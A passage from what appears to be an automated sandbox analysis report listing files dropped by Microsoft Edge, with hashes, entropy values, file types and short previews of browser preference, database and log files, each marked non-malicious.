                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                      Entropy (8bit):1.4421148531561183
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBM/:JkIEumQv8m1ccnvS60qpezt7Y1a
                                                                                                                                                                                                                                                      MD5:6C7D6271EF7B2894DAF97494E1D4A951
                                                                                                                                                                                                                                                      SHA1:0A9D3F3C8E2654AB12902251C9F15162A462C67B
                                                                                                                                                                                                                                                      SHA-256:8E640D4929162D25619D7FB76F690A808116A71B1D0FF8D73E9CC50FA96E5D33
                                                                                                                                                                                                                                                      SHA-512:4482024005BC18DE86542F8A9F697C5E5EF358C8E7D9704CE05CAA83085FE0A76DBEB4DDA2EA3184E512ECD4AE09C240C4AA22698A2DB26B904D7A781CDE5F0E
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:[]
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1699
                                                                                                                                                                                                                                                      Entropy (8bit):5.294391022320496
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:YcCpfgCzsKts0fcKsFy1C9kBRsFJCgHnYhbZ:F2fBX6qYkB2JTYh9
                                                                                                                                                                                                                                                      MD5:F949AD2F639D2F49CDB1C4D0E3596135
                                                                                                                                                                                                                                                      SHA1:D7332E189192B4071C0D740B4146424E84507FBC
                                                                                                                                                                                                                                                      SHA-256:477E58BBD44B8A1ADDB04C4E60E21C81483D718DAC0758AB655CE77889D43512
                                                                                                                                                                                                                                                      SHA-512:1643683977DAD7C289CE3086292E435B6E872BEFB076EE7683ED6931434C2302439CB26D0521A4369F1BBFC448950A02ED9C2CDE190B0FFEA28D85657DB52C70
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380068318151251","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13380068323148020","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377562725999795","port":443,"protocol_str":"quic"}],"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"ser
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                      Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                      MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                      SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                      SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                      SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):9682
                                                                                                                                                                                                                                                      Entropy (8bit):5.113435678009496
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:stAkdpqnsxTIlN6xykTE58mbV+Fw1QAxy93hPjYJ:stAQksxTi4UbGaQb9u
                                                                                                                                                                                                                                                      MD5:FB02E70C32E210331D2771F08B786041
                                                                                                                                                                                                                                                      SHA1:1EA75C858063782C4516655483D39A20466BA080
                                                                                                                                                                                                                                                      SHA-256:FD0503FF118E7B0B8EAEFC1CCC5E6C0F1DCE6C314FA313342C2534BAA59B7036
                                                                                                                                                                                                                                                      SHA-512:0057099ADB62F14E2A2A6692A85EB6E9A41B74CA48C3A804AAD0461A5FD9FB456B822DCD074C1138811E4222F029007A0D2FA81D894076BB31A1BD40C7975B76
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377476314100977","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):9682
                                                                                                                                                                                                                                                      Entropy (8bit):5.113435678009496
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:stAkdpqnsxTIlN6xykTE58mbV+Fw1QAxy93hPjYJ:stAQksxTi4UbGaQb9u
                                                                                                                                                                                                                                                      MD5:FB02E70C32E210331D2771F08B786041
                                                                                                                                                                                                                                                      SHA1:1EA75C858063782C4516655483D39A20466BA080
                                                                                                                                                                                                                                                      SHA-256:FD0503FF118E7B0B8EAEFC1CCC5E6C0F1DCE6C314FA313342C2534BAA59B7036
                                                                                                                                                                                                                                                      SHA-512:0057099ADB62F14E2A2A6692A85EB6E9A41B74CA48C3A804AAD0461A5FD9FB456B822DCD074C1138811E4222F029007A0D2FA81D894076BB31A1BD40C7975B76
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377476314100977","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):9682
                                                                                                                                                                                                                                                      Entropy (8bit):5.113435678009496
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:stAkdpqnsxTIlN6xykTE58mbV+Fw1QAxy93hPjYJ:stAQksxTi4UbGaQb9u
                                                                                                                                                                                                                                                      MD5:FB02E70C32E210331D2771F08B786041
                                                                                                                                                                                                                                                      SHA1:1EA75C858063782C4516655483D39A20466BA080
                                                                                                                                                                                                                                                      SHA-256:FD0503FF118E7B0B8EAEFC1CCC5E6C0F1DCE6C314FA313342C2534BAA59B7036
                                                                                                                                                                                                                                                      SHA-512:0057099ADB62F14E2A2A6692A85EB6E9A41B74CA48C3A804AAD0461A5FD9FB456B822DCD074C1138811E4222F029007A0D2FA81D894076BB31A1BD40C7975B76
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377476314100977","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):9682
                                                                                                                                                                                                                                                      Entropy (8bit):5.113435678009496
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:stAkdpqnsxTIlN6xykTE58mbV+Fw1QAxy93hPjYJ:stAQksxTi4UbGaQb9u
                                                                                                                                                                                                                                                      MD5:FB02E70C32E210331D2771F08B786041
                                                                                                                                                                                                                                                      SHA1:1EA75C858063782C4516655483D39A20466BA080
                                                                                                                                                                                                                                                      SHA-256:FD0503FF118E7B0B8EAEFC1CCC5E6C0F1DCE6C314FA313342C2534BAA59B7036
                                                                                                                                                                                                                                                      SHA-512:0057099ADB62F14E2A2A6692A85EB6E9A41B74CA48C3A804AAD0461A5FD9FB456B822DCD074C1138811E4222F029007A0D2FA81D894076BB31A1BD40C7975B76
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13377476314100977","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340975013362099","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1,"datatype_details_migration_performed":true},"co
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):24853
                                                                                                                                                                                                                                                      Entropy (8bit):5.5655482976743285
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:xhI9PEWP11fQj8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkdYb9OrwwpHtu3:xhI9PEWP11fQju1jah+b9LYt8
                                                                                                                                                                                                                                                      MD5:95A548804DEEDBC22575BCA8B70B7B5D
                                                                                                                                                                                                                                                      SHA1:A798F1E84992240BD9C149CC8E06650A98E36616
                                                                                                                                                                                                                                                      SHA-256:4F1B1A575DABBD4DCC517D2E7B37A0F853E041E2B3CBD571AD0E286B7079AC7F
                                                                                                                                                                                                                                                      SHA-512:123F11E7398DB638FEE5C4413CEDDF688640B012DADA1131478FE20C8E12E4DA25C13681CFAC3B3458E357CBF8B4D3AC400867F24A9A64290AD8ECA20FAEFE9B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377476313526291","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377476313526291","location":5,"ma
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):24853
                                                                                                                                                                                                                                                      Entropy (8bit):5.5655482976743285
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:768:xhI9PEWP11fQj8F1+UoAYDCx9Tuqh0VfUC9xbog/OVkdYb9OrwwpHtu3:xhI9PEWP11fQju1jah+b9LYt8
                                                                                                                                                                                                                                                      MD5:95A548804DEEDBC22575BCA8B70B7B5D
                                                                                                                                                                                                                                                      SHA1:A798F1E84992240BD9C149CC8E06650A98E36616
                                                                                                                                                                                                                                                      SHA-256:4F1B1A575DABBD4DCC517D2E7B37A0F853E041E2B3CBD571AD0E286B7079AC7F
                                                                                                                                                                                                                                                      SHA-512:123F11E7398DB638FEE5C4413CEDDF688640B012DADA1131478FE20C8E12E4DA25C13681CFAC3B3458E357CBF8B4D3AC400867F24A9A64290AD8ECA20FAEFE9B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13377476313526291","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13377476313526291","location":5,"ma
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2294
                                                                                                                                                                                                                                                      Entropy (8bit):5.837354841158366
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:F2xc5Nmncncmo0CRORpllg2DjfRHVVdCRORpllg2Sc03osxsgKCRORpllg2DmRHM:F2emItrdDjfBvXrdYxs/rdDmBzrdhB+
                                                                                                                                                                                                                                                      MD5:2DC74DA042B1CC19DEE956C9FFC84273
                                                                                                                                                                                                                                                      SHA1:7E403674B6FF84EB9A99256182D03DF8683A944A
                                                                                                                                                                                                                                                      SHA-256:79EF4B7B6A7E486319DA4C1671E2A76954D8D47C668BCA1624F6E2414A5C19E8
                                                                                                                                                                                                                                                      SHA-512:5775EB580DF49B9810F74D293D75F7B579DC31D90A2BF2E96654573DD38D467680279E98D2C272CE6B54DFDC3765A632F4F861180AA376DE039188A0C854A216
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..?.m................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8........@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x..................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                      MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                      SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                      SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                      SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):295
                                                                                                                                                                                                                                                      Entropy (8bit):5.195661797321462
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:6:HWi1u51Fi23oH+TcwtE/a252KLlVWi1uT5uDJN+q2PFi23oH+TcwtE/a2ZIFUv:2i1u5ZYeb8xLOi1uT5uX+vdZYeb8J2F2
                                                                                                                                                                                                                                                      MD5:00FF885321D3CB542357482A40C2720E
                                                                                                                                                                                                                                                      SHA1:E6EC2BCC7F06ECE1470AF39E6869F28A4EFCE7B7
                                                                                                                                                                                                                                                      SHA-256:2798C257F2A0A192DB9C376ED72ECF7566BC7B07A1B6D3E6E3FFA77D77914D48
                                                                                                                                                                                                                                                      SHA-512:A230D6E88E12FEEED0ADA94FCE2443FD33EDDB702E6AB40983B02611C9BBB0BEB6577D9A68428B9851811612D80D229EBFAB200B3E36D3E0666B14AFD5E639D2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:2024/11/30-16:38:50.595 1f5c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/30-16:38:50.606 1f5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):41
                                                                                                                                                                                                                                                      Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                      MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                      SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                      SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                      SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):114376
                                                                                                                                                                                                                                                      Entropy (8bit):5.578572683733249
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:AU906yxPXfOxr1lhCe1nL/rmL/rBZXECjAWNKPt3dfvYga7:d9LyxPXfOxr1lMe1nL/CL/TXEmsvFg
                                                                                                                                                                                                                                                      MD5:0DAACF01C56918787ADA39CA36AED776
                                                                                                                                                                                                                                                      SHA1:5CB5BFE649CC445FBD8000BB71D87F04117BA41C
